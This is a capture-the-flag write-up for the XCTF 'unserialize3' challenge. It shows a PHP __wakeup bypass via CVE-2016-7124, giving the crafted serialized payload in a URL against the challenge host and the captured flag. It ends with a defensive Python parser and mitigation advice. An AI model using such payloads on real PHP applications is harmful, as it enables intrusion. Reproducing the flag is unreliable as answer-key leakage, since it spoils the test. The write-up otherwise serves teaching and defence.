Xctf attack and defense world web master advanced area unserialize3
2022-07-28 03:34:00 【l8947943】
0x01. Enter the environment
The page displays this piece of source code (the class body is shown without its closing brace; it is added here for completeness):
class xctf{
public $flag = '111';
public function __wakeup(){
exit('bad requests');
}
}
?code=
0x02. Problem analysis
0x02_1. Code audit
First, a class named xctf is defined. It has two members: the property flag and the method __wakeup. The __wakeup method is implemented next, and the last line, code, is unfinished; presumably this is the GET parameter we are expected to pass in and complete.
Here __wakeup is one of PHP's so-called "magic methods": it is called automatically when an object is unserialized, before any other method runs on it.
That means if we simply construct a serialized string, __wakeup runs first and calls exit directly, which is not what we want.
In other words, once our constructed code parameter is passed in, the __wakeup method is invoked first, so we need a way to bypass it.
0x02_2. Try
After reading other people's write-ups (WP), I learned that a vulnerability (CVE-2016-7124) makes it possible to skip the execution of __wakeup by making the value that represents the number of object properties in the serialized string greater than the actual number of properties.
First, the standard format of a serialized object string is: O:<length of class name>:"<class name>":<number of member properties>:{s:<length of property name>:"<property name>";s:<length of value>:"<value>";......} For this challenge, if the xctf class is serialized correctly, its string should be: O:4:"xctf":1:{s:4:"flag";s:3:"111";}
Online test address: https://www.dooccn.com/php/. Use the following code to verify:
<?php
class xctf{
public $flag = '111';
public function __wakeup(){
exit('bad requests');
}
}
$a = new xctf();
print(serialize($a)); // prints O:4:"xctf":1:{s:4:"flag";s:3:"111";}
?>
0x02_3. Skipping the __wakeup() function
Modify the serialized string by changing the number of properties it declares, assemble the full URL, and send it as a GET request; the resulting address is:
http://61.147.171.105:56068/?code=O:4:"xctf":2:{s:4:"flag";s:3:"111";}
This returns the final answer: cyberpeace{d0e766c698b67400e771051e6b8301aa}
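As an added example (not from the original write-up), this is the check a defender would put in front of unserialize() or into a request-log scanner: a strict parser for the serialized format described above that rejects any string whose declared property count or length field disagrees with its content, which is exactly the CVE-2016-7124 pattern used in this challenge. It is my own code and assumes a subset of the format (i, b, s, a and O values, nested, but no references and no escaped S: strings).

```python
import re

# Constructed samples: serialize() output for this page's xctf class, and the
# same string with the declared property count raised from 1 to 2.
GOOD = 'O:4:"xctf":1:{s:4:"flag";s:3:"111";}'
MISMATCH = 'O:4:"xctf":2:{s:4:"flag";s:3:"111";}'

OBJ_HEADER = re.compile(r'O:(\d+):"([^"]*)":(\d+):\{')   # O:<len>:"<class>":<count>:{
ARR_HEADER = re.compile(r'a:(\d+):\{')                   # a:<count>:{

class BadPayload(ValueError):
    """Malformed data, or a length/count field that disagrees with the content."""

def _parse(data, pos):
    """Parse one value at data[pos]; return (value, position after it)."""
    tag = data[pos]
    if tag in ('i', 'b'):                            # i:42;  b:1;
        end = data.index(';', pos)
        return int(data[pos + 2:end]), end + 1
    if tag == 's':                                   # s:<len>:"<bytes>";
        colon = data.index(':', pos + 2)
        length, start = int(data[pos + 2:colon]), colon + 2
        if data[start + length:start + length + 2] != '";':
            raise BadPayload('string length field disagrees with content')
        return data[start:start + length], start + length + 2
    if tag in ('O', 'a'):
        m = (OBJ_HEADER if tag == 'O' else ARR_HEADER).match(data, pos)
        if not m:
            raise BadPayload('malformed container header')
        if tag == 'O' and int(m.group(1)) != len(m.group(2)):
            raise BadPayload('class name length field disagrees with name')
        declared, members, cur = int(m.group(m.lastindex)), {}, m.end()
        while data[cur] != '}':                      # key/value pairs up to '}'
            key, cur = _parse(data, cur)
            members[key], cur = _parse(data, cur)
        if len(members) != declared:                 # the CVE-2016-7124 trigger
            raise BadPayload(f'declared {declared} members, found {len(members)}')
        return ((m.group(2), members) if tag == 'O' else members), cur + 1
    raise BadPayload(f'unsupported type tag {tag!r}')

def parse_php_serialized(data):
    """Strict parse; raises BadPayload instead of tolerating inconsistent fields."""
    return _parse(data, 0)[0]

def is_consistent(data):
    try:
        parse_php_serialized(data)
    except (BadPayload, ValueError, IndexError):
        return False
    return True
```

In PHP 5.6.25 / 7.0.10 and later the engine itself rejects this mismatch instead of skipping __wakeup, so the check is mainly useful as a detection rule; the durable fix is to keep untrusted input away from unserialize() (use JSON, or at least unserialize($s, ['allowed_classes' => false])).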